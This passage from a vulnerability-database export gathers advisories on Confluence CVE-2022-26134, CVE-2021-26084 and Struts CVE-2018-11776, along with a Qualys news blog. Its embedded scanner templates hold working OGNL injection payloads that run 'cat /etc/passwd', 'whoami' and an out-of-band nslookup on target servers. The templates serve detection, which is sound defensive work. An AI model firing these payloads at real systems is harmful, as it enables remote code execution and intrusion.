"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA:695499EEB6D0CB5B73EEE7BCED9FD497", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T14:02:20", "description": "Atlassian has released a security advisory to address a remote code execution vulnerability (CVE-2022-26134) affecting Confluence Server and Data Center products. An unauthenticated remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability.\n\nThere are currently no updates available. Atlassian is working to issue an update. CISA strongly recommends that organizations review [Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for more information. CISA urges organizations with affected Atlassian\u2019s Confluence Server and Data Center products to block all internet traffic to and from those devices until an update is available and successfully applied.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Advisory for Confluence Server and Data Center, CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA:71FB648030101FA9B007125DFA636193", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-01T13:56:33", "description": "Atlassian has released new Confluence Server and Data Center versions to address [remote code execution vulnerability CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>) affecting these products. An unauthenticated remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability.\n\nCISA strongly urges organizations to review [Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) and upgrade Confluence Server and Confluence Data Center.\n\n**Note:** per [BOD 22-01 Catalog of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>), federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products AND either apply the software update to all affected instances OR remove the affected products by 5 pm ET on Monday, June 6, 2022.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "cisa", "title": "Atlassian Releases New Versions of Confluence Server and Data Center to Address CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-30T00:00:00", "id": "CISA:9E73FFA29BFAFFF667AC400A87F5434E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "atlassian": [{"lastseen": "2021-11-26T18:44:44", "description": "*This vulnerability is being actively exploited in the wild. Affected servers should be patched immediately.*\r\n\r\nAn OGNL injection vulnerability exists that allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\r\nThe CVE ID is CVE-2021-26084.\r\nh4. Acknowledgements\r\n\r\nThe issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.\r\n\r\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\r\n\r\n*Affected versions:*\r\n * version < 6.13.23\r\n * 6.14.0 \u2264 version < 7.4.11\r\n * 7.5.0 \u2264 version < 7.11.5\r\n * 7.12.0 \u2264 version < 7.12.5\r\n\r\n*Fixed versions:*\r\n * 6.13.23\r\n * 7.4.11\r\n * 7.11.6\r\n * 7.12.5\r\n * 7.13.0 \u00a0\r\n\r\n\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-27T05:13:48", "type": "atlassian", "title": "Confluence Server Webwork OGNL injection - CVE-2021-26084", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-22T01:29:22", "id": "ATLASSIAN:CONFSERVER-67940", "href": "https://jira.atlassian.com/browse/CONFSERVER-67940", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T16:04:52", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\u00a0\r\nThe affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.\r\n\u00a0\r\nFor more information, see https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T20:08:07", "type": "atlassian", "title": "Remote code execution via OGNL injection in Confluence Server & Data Center - CVE-2022-26134", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-08-28T16:50:16", "id": "CONFSERVER-79016", "href": "https://jira.atlassian.com/browse/CONFSERVER-79016", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T16:04:51", "description": "This is a duplicate of https://jira.atlassian.com/browse/CONFSERVER-79016\r\n\r\nSee the link above for more information on the issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T03:36:35", "type": "atlassian", "title": "Unauthenticated remote code execution vulnerability via OGNL template injection - Duplicate", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-07-28T08:01:08", "id": "CONFSERVER-79000", "href": "https://jira.atlassian.com/browse/CONFSERVER-79000", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nuclei": [{"lastseen": "2023-12-03T21:52:07", "description": "Confluence Server and Data Center contain an OGNL injection vulnerability that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-04T16:21:34", "type": "nuclei", "title": "Confluence Server - Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2020-04-04T16:21:34", "id": "NUCLEI:CVE-2021-26084", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2021/CVE-2021-26084.yaml", "sourceData": "id: CVE-2021-26084\n\ninfo:\n name: Confluence Server - Remote Code Execution\n author: dhiyaneshDk,philippedelteil\n severity: critical\n description: Confluence Server and Data Center contain an OGNL injection vulnerability that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options.\n remediation: |\n Apply the latest security patches provided by Atlassian to mitigate this vulnerability.\n reference:\n - https://jira.atlassian.com/browse/CONFSERVER-67940\n - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26084\n - https://github.com/Udyz/CVE-2021-26084\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-26084\n cwe-id: CWE-917\n epss-score: 0.97153\n epss-percentile: 0.99751\n cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 13\n vendor: atlassian\n product: confluence_data_center\n shodan-query: http.component:\"Atlassian Confluence\"\n tags: cve,cve2021,rce,confluence,injection,ognl,kev\n\nhttp:\n - raw:\n - |\n POST /{{path}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb\n\n payloads:\n path:\n - pages/createpage-entervariables.action?SpaceKey=x\n - pages/createpage-entervariables.action\n - confluence/pages/createpage-entervariables.action?SpaceKey=x\n - confluence/pages/createpage-entervariables.action\n - wiki/pages/createpage-entervariables.action?SpaceKey=x\n - wiki/pages/createpage-entervariables.action\n - pages/doenterpagevariables.action\n - pages/createpage.action?spaceKey=myproj\n - pages/templates2/viewpagetemplate.action\n - pages/createpage-entervariables.action\n - template/custom/content-editor\n - templates/editor-preload-container\n - users/user-dark-features\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'value=\"aaaa{140592=null}'\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220592296ff57ee2ca763864bec9edcbff8e2e2fc69e5e7ecfeea7ef28af6a4144402205633489a44cfc5c0a7415273618461fb2ac6446f66b1a2dc90dbbf7a16775dbe:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T21:46:58", "description": "\n Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-04T16:21:34", "type": "nuclei", "title": "Apache Struts2 S2-057 - Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2020-04-04T16:21:34", "id": "NUCLEI:CVE-2018-11776", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2018/CVE-2018-11776.yaml", "sourceData": "id: CVE-2018-11776\n\ninfo:\n name: Apache Struts2 S2-057 - Remote Code Execution\n author: pikpikcu\n severity: high\n description: |\n Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.\n reference:\n - https://github.com/jas502n/St2-057\n - https://cwiki.apache.org/confluence/display/WW/S2-057\n - https://security.netapp.com/advisory/ntap-20180822-0001/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11776\n - http://packetstormsecurity.com/files/172830/Apache-Struts-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2018-11776\n cwe-id: CWE-20\n epss-score: 0.97557\n epss-percentile: 0.99996\n cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: packetstorm,cve,cve2018,apache,rce,struts,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n\n# digest: 4b0a004830460221009ff1dc6a959bf68f3bb3a441f3a47e29c1e468cc13d85de718b97c55797d2f8e022100e71c262a031940cb2e8e5ae6332e0a66995264f9a3873bf1195c224e12aa7a4d:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T21:55:32", "description": "\n Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-04T16:21:34", "type": "nuclei", "title": "Confluence - Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2020-04-04T16:21:34", "id": "NUCLEI:CVE-2022-26134", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2022/CVE-2022-26134.yaml", "sourceData": "id: CVE-2022-26134\n\ninfo:\n name: Confluence - Remote Code Execution\n author: pdteam,jbertman\n severity: critical\n description: |\n Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.\n remediation: |\n Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability.\n reference:\n - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis\n - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\n - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/\n - https://jira.atlassian.com/browse/CONFSERVER-79016\n - http://packetstormsecurity.com/files/167431/Through-The-Wire-CVE-2022-26134-Confluence-Proof-Of-Concept.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-26134\n cwe-id: CWE-917\n epss-score: 0.97519\n epss-percentile: 0.99985\n cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: atlassian\n product: confluence_data_center\n shodan-query: http.component:\"Atlassian Confluence\"\n tags: packetstorm,cve,cve2022,confluence,rce,ognl,oast,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/\"\n - \"{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - 'contains(to_lower(header_1), \"x-cmd-response:\")'\n\n - type: dsl\n dsl:\n - 'contains(interactsh_protocol, \"dns\")'\n - 'contains(to_lower(response_2), \"confluence\")'\n condition: and\n\n extractors:\n - type: kval\n kval:\n - \"x_cmd_response\"\n part: header\n\n# digest: 4a0a00473045022006affa053c4fcae2976f75d20b0b62a4911ef7a3701f040771944778b3c395d2022100e564ab928fa74f0703e220834147d93af92f273d089e3125f6ec1e860c8f5567:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2019-01-14T20:46:20", "description": "Ransomware raids aimed at specific targets with big pockets. Another Struts vulnerability -- but scarier than last year\u2019s. An Android spyware that records your phone calls. These are some of the security news that have caught our attention.\n\n### New Struts Bug Should Be Patched Yesterday\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/struts-logo-300x150.png)Apache patched a serious remote code execution vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) affecting all supported versions -- 2.3 to 2.3.34 and 2.5 to 2.5.16 -- of the widely used Struts Java application framework. The bug is considered more dangerous than the one disclosed last year in Struts that was exploited in the massive data breach at Equifax.\n\nIn the Apache [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-057>), the vulnerability is rated \u201cCritical\u201d and users are advised to immediately upgrade to Struts 2.3.35 or Struts 2.5.17.\n\nThe remote code execution becomes possible \u201cwhen using results with no namespace and in same time, its upper action(s) have no or wildcard namespace\u201d and \u201cwhen using url tag which doesn\u2019t have value and action set,\u201d the bulletin reads.\n\nOrganizations should upgrade to the patched Struts versions even if their applications aren\u2019t vulnerable to this bug. \u201cAn inadvertent change to a Struts configuration file may render the application vulnerable in the future,\u201d [stated](<https://semmle.com/news/apache-struts-CVE-2018-11776>) Semmle, whose security researcher Man Yue Mo discovered this vulnerability.\n\nUpgrading should take first priority, considering that Struts is widely used for public web apps, vulnerable systems are easy to identify, and the bug is easy to exploit, according to the company.\n\n\u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk,\u201d said Pavel Avgustinov, a Semmle VP.\n\nWriting in the Qualys blog, Product Management Director Jimmy Graham [noted](<https://blog.qualys.com/securitylabs/2018/08/23/detecting-apache-struts-2-namespace-rce-cve-2018-11776>) that the vulnerability does not exist with a default configuration of Struts, but that \u201cit does exist in commonly seen configurations for some Struts plugins.\u201d\n\n\u201cDue to the ease of exploitation and relatively common configuration that is required, this vulnerability should be patched immediately for all applications that use Struts 2,\u201d Graham wrote. Qualys has defined two QIDs to detect this vulnerability (QID 13251 and QID 371151), and created dynamic [dashboards](<https://community.qualys.com/docs/DOC-6515-dashboards-and-reporting-detecting-apache-struts-2-namespace-rce-cve-2018-11776?_ga=2.73902801.230834091.1535379602-620242525.1458325156>) to visualize it.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/struts-dashboard-2018.png)\n\nGraham also describes how the Qualys Web Application Firewall (WAF) can mitigate the vulnerability.\n\nMore information:\n\n[Apache Struts 2 namespace Remote Code Execution Vulnerability: CVE-2018-11776](<https://threatprotect.qualys.com/2018/08/22/apache-struts-2-namespace-remote-code-execution-vulnerability-cve-2018-11776/?_ga=2.140995313.230834091.1535379602-620242525.1458325156>) _(Qualys)_\n\n[Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>) _(ThreatPost)_\n\n[Admins Urged: Stop Everything and Patch New Apache Struts Flaw](<https://www.infosecurity-magazine.com/news/admins-stop-everything-patch/>) _(InfoSecurity)_\n\n[Experts Urge Rapid Patching of \u2018Struts\u2019 Bug](<https://krebsonsecurity.com/2018/08/experts-urge-rapid-patching-of-struts-bug/>) _(Krebs on Security)_\n\n[PoC Code Surfaces to Exploit Apache Struts 2 Vulnerability](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) _(ThreatPost)_\n\n### Ransomware Campaign Attacks Selected Organizations\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/ransomware-2320941_1280-600x400.jpg)Cyber thieves recently began attacking handpicked corporations with ransomware and demanding skyhigh bitcoin payments.\n\nThe criminals are deliberately targeting specific large businesses, and they\u2019re using ransomware called Ryuk that\u2019s designed for tailored attacks. They reportedly netted more than $600,000 during the campaign\u2019s first two weeks.\n\n\u201cIts encryption scheme is intentionally built for small-scale operations, such that only crucial assets and resources are infected in each targeted network with its infection and distribution carried out manually by the attackers,\u201d CheckPoint researchers [wrote](<https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/>).\n\nThe implication is that prior to each attack, \u201cextensive network mapping, hacking and credential collection\u201d is conducted by the miscreants, believed to have ties to the notorious hacker collective Lazarus Group and be experienced in targeted attacks, according to the researchers.\n\nMore information:\n\n[This new ransomware campaign targets business and demands a massive bitcoin ransom](<https://www.zdnet.com/article/this-new-ransomware-campaign-targets-business-and-demands-a-massive-bitcoin-ransom/>) _(ZDnet)_\n\n[Ryuk Ransomware Emerges in Highly Targeted, Highly Lucrative Campaign](<https://threatpost.com/ryuk-ransomware-emerges-in-highly-targeted-highly-lucrative-campaign/136755/>) _(ThreatPost)_\n\n[Ryuk Ransomware Crew Makes $640,000 in Recent Activity Surge](<https://www.bleepingcomputer.com/news/security/ryuk-ransomware-crew-makes-640-000-in-recent-activity-surge/>) _(BleepingComputer)_\n\n### T-Mobile Hacked, Millions Affected\n\nPersonal information of 2 million T-Mobile customers, [including encrypted passwords](<https://motherboard.vice.com/en_us/article/a3qpk5/t-mobile-hack-data-breach-api-customer-data>), may have been accessed by hackers via a breached API on August 20.\n\nThe compromised data may have included names, billing zip codes, phone numbers, email addresses, and account numbers, but not financial information nor Social Security numbers, [according to the company](<https://www.t-mobile.com/customers/6305378821>). T-Mobile hasn\u2019t provided further details on the nature of the attack.\n\nOn related news, customer security PINs from T-Mobile and AT&T were found to be accessible due to unrelated 